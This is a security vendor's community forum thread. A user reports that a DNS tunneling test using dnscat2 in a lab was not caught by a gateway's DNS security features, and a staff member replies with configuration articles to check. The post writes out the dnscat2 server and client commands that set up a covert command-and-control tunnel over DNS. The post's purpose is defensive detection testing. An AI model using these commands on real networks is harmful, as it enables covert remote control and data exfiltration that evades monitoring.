This website uses Cookies. Click Accept to agree to our website's cookie use as described in our Privacy Policy. Click Preferences to customize your cookie settings.
Accept
Reject
Preferences
ABOUT CHECKMATES CYBER SECURITY COMMUNITY & FAQ
Create a Post
Help
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 

Are you a member of CheckMates?

×
Sign in with your Check Point UserCenter/PartnerMap account to access more great content and get a chance to win some Apple AirPods! If you don't have an account, create one now for free!
LongjiangLI
Explorer
‎2023-10-22 06:13 AM

R81.20 DNS Tunneling Detection ?

Hi Expert , 

      As we know ,The R81.20 has publish a new feature  DNS security blade  .  I have try use the DNSCAT2 to testing the DNS tunneling attack  but not found any prevention log  , ONLY see the firewall DNS log .

       In the gateway   enable Anti-bot、Anti-malware  and IPS blade ;

      Testing topology :   DNSCAT2_Server < ---> Gateway< --->  DNSCAT2_Client  

       Form  DNSCAT2 Server side use command  "ruby ./dnscat2.rb --security=open " create a DNS  listen and without encryption  . In the Client side use command " ./dnscat --dns server=10.0.20.2,port=53 "    CC to  server .  When the establish  can use that tunnel doing any action on the client PC .

    Base  on  this lab , I want know why   haven't catching the DNS tunneling  ,Thanks ! 

        

0 Kudos
1 Reply
Chris_Atkinson
Employee Employee
Employee
‎2023-10-22 08:06 AM

To start could you please confirm how your configuration is set per: sk74120 / sk92224

Please also verify how this protection is currently set?

Screen Shot 2019-12-06 at 4.15.13 PM.png

Refer also: sk178487 - ThreatCloud DNS Tunneling Protection 

CCSM R77/R80/ELITE
(1)

Leaderboard

Epsum factorial non deposit quid pro quo hic escorol.

View All ≫
Upcoming Events

    CheckMates Events